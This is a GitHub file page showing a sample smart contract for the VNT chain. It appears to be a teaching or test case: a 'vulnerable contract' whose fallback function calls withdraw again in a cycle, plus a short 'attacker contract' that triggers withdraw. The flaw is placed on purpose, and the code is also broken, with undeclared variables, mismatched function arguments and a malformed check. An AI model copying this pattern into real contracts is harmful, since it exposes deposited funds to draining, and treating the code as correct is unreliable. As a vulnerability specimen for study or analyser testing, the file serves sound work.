-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathFallback_call_cycle.c
More file actions
63 lines (51 loc) · 1.42 KB
/
Fallback_call_cycle.c
File metadata and controls
63 lines (51 loc) · 1.42 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
// Vulnerable contract
#include "vntlib.h"
typedef struct {
uint256 name; // name
uint256 balance; // deposit
} Account;
KEY mapping(address, Account) accounts;
KEY uint256 count = 0;
constructor $Infinite_loop_call_ring(){
owner = GetSender();
totalGameCount = 0;
}
// check if the amount is enough
void checkAmount(uint256 amount) {
Require(U256_Cmp(amount, U256(0) == 1), "amount must > 0");
address from = GetSender();
accounts.key = from;
uint256 balance = accounts.value.balance;
PrintAddress("get sender:", from);
PrintUint256T("get balance:", balance);
Require(U256_Cmp(U256SafeSub(balance, amount), 0) != -1,
"No enough money to bet");
}
// check contract owner
void checkOwner() {
address sender = GetSender();
Require(Equal(sender, owner) == true, "Only the owner can operate");
}
// withdraw asset
void withdraw(uint256 amount) {
checkAmount("checkAmount", amount); // input parameters are not matched
address addr = GetSender();
uint256 balance = accounts.value.balance;
if (balance >= amount) {
TransferFromContract(addr, amount);
}
}
$_(){ // fallback function
count++;
if (count){
withdraw(amount);
}
}
// Attacker contract
#include "vntlib.h"
CALL void withdraw(CallParams params, uint256 amount);
void attack () {
CallParams params = {Address("0xaaaa"), U256(10000), 100000}; // "0xaaaa" represents Vulnerable contract.
withdraw(params, 100);
}
...